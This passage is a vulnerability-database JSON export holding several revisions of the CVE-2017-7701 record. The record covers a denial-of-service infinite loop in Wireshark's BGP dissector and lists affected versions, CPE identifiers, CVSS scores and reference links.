"cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-7701"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-835"], "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.", "edition": 5, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:50", "references": [{"idList": ["GLSA-201706-12"], "type": "gentoo"}, {"idList": ["WIRESHARK_2_2_6.NASL", "GENTOO_GLSA-201706-12.NASL", "SUSE_SU-2017-1174-1.NASL", "OPENSUSE-2017-503.NASL", "MACOSX_WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL"], "type": "nessus"}, {"idList": ["KLA11020"], "type": "kaspersky"}, {"idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2021-02-02T06:36:50", "rev": 2, "value": 6.7, "vector": "NONE"}}, "extraReferences": [{"name": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "refsource": "CONFIRM", "tags": ["Patch", "Issue Tracking"], "url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557"}, {"name": "1038262", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1038262"}, {"name": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory", "Issue Tracking"], "url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a"}, {"name": "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://www.wireshark.org/security/wnpa-sec-2017-16.html"}, {"name": "GLSA-201706-12", "refsource": "GENTOO", "tags": [], "url": "https://security.gentoo.org/glsa/201706-12"}, {"name": "97632", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/97632"}], "hash": "44976d1f3d9dbf12bab61b12a78c5aa7ac185250b45d24214ed4ce7f91c25d4c", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "a8addda400df227f3f9d504b8bf755ad", "key": "cpe23"}, {"hash": "b5cef30da83f9b368c6b3bb523042642", "key": "cvss3"}, {"hash": "034034f11b463c3726b3a9bb8c0552b6", "key": "title"}, {"hash": "4485efe94be6fb1ff0c624a29ba28fb5", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "f0a3393dc404b0d05dce8b6e917485ed", "key": "cwe"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "1b4916f7c4edf016e474d2a5b365d8b5", "key": "description"}, {"hash": "0000d23751485532e6eaaf6a0ba6dfba", "key": "cpeConfiguration"}, {"hash": "320c841dc67e16a6e2e32b483bde222c", "key": "extraReferences"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f270045201733e8c2dcabcbb38595fcb", "key": "href"}, {"hash": "bcc4c735b1a2a8bf1aa695390c583d95", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "163ed47a37dad47f3193d5f1ec99e988", "key": "affectedSoftware"}, {"hash": "1f0cc7832f07ee78350b613e89af69f8", "key": "modified"}, {"hash": "ad23b248d8f80b5f7ddf0afdf78d0d64", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "7ca9f704c6cd251dc88f5934562611bc", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7701", "id": "CVE-2017-7701", "immutableFields": [], "lastseen": "2021-02-02T06:36:50", "modified": "2019-10-03T00:03:00", "objectVersion": "1.5", "published": "2017-04-12T23:59:00", "references": ["https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "http://www.securitytracker.com/id/1038262", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "http://www.securityfocus.com/bid/97632", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://security.gentoo.org/glsa/201706-12"], "reporter": "cve@mitre.org", "title": "CVE-2017-7701", "type": "cve", "viewCount": 6}, "different_elements": ["cpeConfiguration"], "edition": 5, "lastseen": "2021-02-02T06:36:50"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.7"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.9"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.8"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.11"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.6"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.10"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.4"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.4"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:wireshark:wireshark:2.2.5", "cpe:/a:wireshark:wireshark:2.2.3", "cpe:/a:wireshark:wireshark:2.0.0", "cpe:/a:wireshark:wireshark:2.0.1", "cpe:/a:wireshark:wireshark:2.2.0", "cpe:/a:wireshark:wireshark:2.0.8", "cpe:/a:wireshark:wireshark:2.0.9", "cpe:/a:wireshark:wireshark:2.0.3", "cpe:/a:wireshark:wireshark:2.0.4", "cpe:/a:wireshark:wireshark:2.0.10", "cpe:/a:wireshark:wireshark:2.2.4", "cpe:/a:wireshark:wireshark:2.0.6", "cpe:/a:wireshark:wireshark:2.2.1", "cpe:/a:wireshark:wireshark:2.0.2", "cpe:/a:wireshark:wireshark:2.2.2", "cpe:/a:wireshark:wireshark:2.0.11", "cpe:/a:wireshark:wireshark:2.0.5", "cpe:/a:wireshark:wireshark:2.0.7"], "cpe23": ["cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-7701"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-835"], "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:30", "references": [{"idList": ["GLSA-201706-12"], "type": "gentoo"}, {"idList": ["WIRESHARK_2_2_6.NASL", "GENTOO_GLSA-201706-12.NASL", "SUSE_SU-2017-1174-1.NASL", "OPENSUSE-2017-503.NASL", "MACOSX_WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL"], "type": "nessus"}, {"idList": ["KLA11020"], "type": "kaspersky"}, {"idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:30", "rev": 2, "value": 6.7, "vector": "NONE"}}, "hash": "d6eefb7505c4471d3ff3a794478807a72010772ae57105e78ff831b2c5fd1d4a", "hashmap": [{"hash": "a8addda400df227f3f9d504b8bf755ad", "key": "cpe23"}, {"hash": "b5cef30da83f9b368c6b3bb523042642", "key": "cvss3"}, {"hash": "034034f11b463c3726b3a9bb8c0552b6", "key": "title"}, {"hash": "4485efe94be6fb1ff0c624a29ba28fb5", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "f0a3393dc404b0d05dce8b6e917485ed", "key": "cwe"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "1b4916f7c4edf016e474d2a5b365d8b5", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f270045201733e8c2dcabcbb38595fcb", "key": "href"}, {"hash": "bcc4c735b1a2a8bf1aa695390c583d95", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "163ed47a37dad47f3193d5f1ec99e988", "key": "affectedSoftware"}, {"hash": "1f0cc7832f07ee78350b613e89af69f8", "key": "modified"}, {"hash": "ad23b248d8f80b5f7ddf0afdf78d0d64", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "7ca9f704c6cd251dc88f5934562611bc", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7701", "id": "CVE-2017-7701", "lastseen": "2020-09-21T14:31:30", "modified": "2019-10-03T00:03:00", "objectVersion": "1.3", "published": "2017-04-12T23:59:00", "references": ["https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "http://www.securitytracker.com/id/1038262", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "http://www.securityfocus.com/bid/97632", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://security.gentoo.org/glsa/201706-12"], "reporter": "cve@mitre.org", "title": "CVE-2017-7701", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 3, "lastseen": "2020-09-21T14:31:30"}, {"bulletin": {"affectedSoftware": [{"name": "wireshark wireshark", "operator": "eq", "version": "2.0.3"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.8"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.1"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.3"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.1"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.4"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.0"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.0"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.2"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.5"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.2"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.5"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.11"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.7"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.6"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.10"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.9"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.4"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:wireshark:wireshark:2.2.5", "cpe:/a:wireshark:wireshark:2.2.3", "cpe:/a:wireshark:wireshark:2.0.0", "cpe:/a:wireshark:wireshark:2.0.1", "cpe:/a:wireshark:wireshark:2.2.0", "cpe:/a:wireshark:wireshark:2.0.8", "cpe:/a:wireshark:wireshark:2.0.9", "cpe:/a:wireshark:wireshark:2.0.3", "cpe:/a:wireshark:wireshark:2.0.4", "cpe:/a:wireshark:wireshark:2.0.10", "cpe:/a:wireshark:wireshark:2.2.4", "cpe:/a:wireshark:wireshark:2.0.6", "cpe:/a:wireshark:wireshark:2.2.1", "cpe:/a:wireshark:wireshark:2.0.2", "cpe:/a:wireshark:wireshark:2.2.2", "cpe:/a:wireshark:wireshark:2.0.11", "cpe:/a:wireshark:wireshark:2.0.5", "cpe:/a:wireshark:wireshark:2.0.7"], "cpe23": ["cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*"], "cvelist": ["CVE-2017-7701"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-835"], "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:19:24", "references": [{"idList": ["GLSA-201706-12"], "type": "gentoo"}, {"idList": ["WIRESHARK_2_2_6.NASL", "GENTOO_GLSA-201706-12.NASL", "SUSE_SU-2017-1174-1.NASL", "OPENSUSE-2017-503.NASL", "MACOSX_WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL"], "type": "nessus"}, {"idList": ["KLA11020"], "type": "kaspersky"}, {"idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2019-10-04T12:19:24", "rev": 2, "value": 6.7, "vector": "NONE"}}, "hash": "2e713a759e3a11117e322f3ea425f24c144ddf331845326f2df297ed4f193ef4", "hashmap": [{"hash": "a8addda400df227f3f9d504b8bf755ad", "key": "cpe23"}, {"hash": "b5cef30da83f9b368c6b3bb523042642", "key": "cvss3"}, {"hash": "034034f11b463c3726b3a9bb8c0552b6", "key": "title"}, {"hash": "4485efe94be6fb1ff0c624a29ba28fb5", "key": "cpe"}, {"hash": "f0a3393dc404b0d05dce8b6e917485ed", "key": "cwe"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "1b4916f7c4edf016e474d2a5b365d8b5", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f270045201733e8c2dcabcbb38595fcb", "key": "href"}, {"hash": "bcc4c735b1a2a8bf1aa695390c583d95", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "1f0cc7832f07ee78350b613e89af69f8", "key": "modified"}, {"hash": "a4ca8293315ef736211af4f45a7559e6", "key": "affectedSoftware"}, {"hash": "ad23b248d8f80b5f7ddf0afdf78d0d64", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "7ca9f704c6cd251dc88f5934562611bc", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7701", "id": "CVE-2017-7701", "lastseen": "2019-10-04T12:19:24", "modified": "2019-10-03T00:03:00", "objectVersion": "1.3", "published": "2017-04-12T23:59:00", "references": ["https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "http://www.securitytracker.com/id/1038262", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "http://www.securityfocus.com/bid/97632", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://security.gentoo.org/glsa/201706-12"], "reporter": "cve@mitre.org", "title": "CVE-2017-7701", "type": "cve", "viewCount": 4}, "differentElements": ["affectedSoftware"], "edition": 2, "lastseen": "2019-10-04T12:19:24"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.7"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.9"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.8"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.11"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.6"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.10"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.4"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.4"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:wireshark:wireshark:2.2.5", "cpe:/a:wireshark:wireshark:2.2.3", "cpe:/a:wireshark:wireshark:2.0.0", "cpe:/a:wireshark:wireshark:2.0.1", "cpe:/a:wireshark:wireshark:2.2.0", "cpe:/a:wireshark:wireshark:2.0.8", "cpe:/a:wireshark:wireshark:2.0.9", "cpe:/a:wireshark:wireshark:2.0.3", "cpe:/a:wireshark:wireshark:2.0.4", "cpe:/a:wireshark:wireshark:2.0.10", "cpe:/a:wireshark:wireshark:2.2.4", "cpe:/a:wireshark:wireshark:2.0.6", "cpe:/a:wireshark:wireshark:2.2.1", "cpe:/a:wireshark:wireshark:2.0.2", "cpe:/a:wireshark:wireshark:2.2.2", "cpe:/a:wireshark:wireshark:2.0.11", "cpe:/a:wireshark:wireshark:2.0.5", "cpe:/a:wireshark:wireshark:2.0.7"], "cpe23": ["cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": 